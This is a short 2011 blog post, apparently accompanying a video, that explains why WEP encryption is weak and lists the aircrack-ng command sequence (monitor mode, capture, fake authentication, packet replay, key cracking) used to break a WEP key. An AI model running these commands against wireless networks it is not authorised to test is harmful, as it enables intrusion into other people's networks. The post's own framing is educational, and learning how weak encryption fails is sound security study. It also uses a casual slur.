Thursday, 24 February 2011

WEP Cracking

So next vid then, I decided to show how to crack a WEP key. WEP is very insecure and not too difficult to break.

So before everyone thinks "yay free wifi" don't start breaking in to your next doors wifi. Instead, try advising them that maybe they should think about changing their security.

A few prerequisites;
You will struggle to do this in a virtual box.
A lot of  laptop network cards will not work as there are driver issuses.
The network card must be able to switch to monitor mode and if it can also packet inject, it makes life easier.

So why is WEP so insecure? WEP uses the RC4 stream cipher, an initialisation vector and the WEP key.
The initialisation vectors(IV) is only 24bits long which is far to short. When packets are sent though the access point, the WEP key plus the IV are sent meaning that it is visible for all to see. Once the attack has seen or collected enough of these IV's its possible to work out the WEP key. By re-injecting the packets we are able to speed up this process.

The steps:

airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c -w 2neon --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -3 -b (bssid) mon0
aircrack-ng -b (bssid) (2neon-01.cap)

-c is the channel of the access point
-w is a text file name it anything aslong as at the end you call txt-01.cap

The video:
WEP cracking in BT

Again the mouse was gayed when recording this, will make sure that in the next vids that is sorted.

In the words of swaZ "we're cooking now".


No comments:

Post a Comment